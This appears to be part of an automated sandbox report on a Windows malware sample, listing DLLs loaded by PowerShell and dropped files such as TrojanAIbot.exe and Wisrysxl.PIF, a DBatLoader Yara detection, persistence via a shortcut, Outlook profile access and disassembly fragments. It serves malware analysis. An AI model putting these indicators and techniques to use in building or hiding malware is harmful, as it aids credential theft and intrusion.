Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: TrojanAIbot.exe.lnk.10.dr

LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 2jbMIxCFsK.exe

Static file information: File size 1392640 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0.2.2jbMIxCFsK.exe.2e60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: lxsyrsiW.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02E7894C

Source: Wisrysxl.PIF.6.dr	Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: 2jbMIxCFsK.exe	Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: neworigin.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: armsvc.exe.8.dr	Static PE information: real checksum: 0x32318 should be: 0x14991f
Source: lxsyrsiW.pif.0.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: TrojanAIbot.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: server_BTC.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x42478

Source: alpha.pif.4.dr	Static PE information: section name: .didat
Source: armsvc.exe.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8D2FC push 02E8D367h; ret	0_2_02E8D35F
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E663AE push 02E6640Bh; ret	0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E663B0 push 02E6640Bh; ret	0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8C378 push 02E8C56Eh; ret	0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6C349 push 8B02E6C1h; ret	0_2_02E6C34E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6332C push eax; ret	0_2_02E63368
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8D0AC push 02E8D125h; ret	0_2_02E8D11D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7306C push 02E730B9h; ret	0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7306B push 02E730B9h; ret	0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8D1F8 push 02E8D288h; ret	0_2_02E8D280
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8D144 push 02E8D1ECh; ret	0_2_02E8D1E4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7F108 push ecx; mov dword ptr [esp], edx	0_2_02E7F10D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E66784 push 02E667C6h; ret	0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E66782 push 02E667C6h; ret	0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6D5A0 push 02E6D5CCh; ret	0_2_02E6D5C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6C56C push ecx; mov dword ptr [esp], edx	0_2_02E6C571
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E8C570 push 02E8C56Eh; ret	0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7AAE0 push 02E7AB18h; ret	0_2_02E7AB10
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E78AD8 push 02E78B10h; ret	0_2_02E78B08
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6CA4E push 02E6CD72h; ret	0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E6CBEC push 02E6CD72h; ret	0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7886C push 02E788AEh; ret	0_2_02E788A6
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02ED4850 push eax; ret	0_2_02ED4920
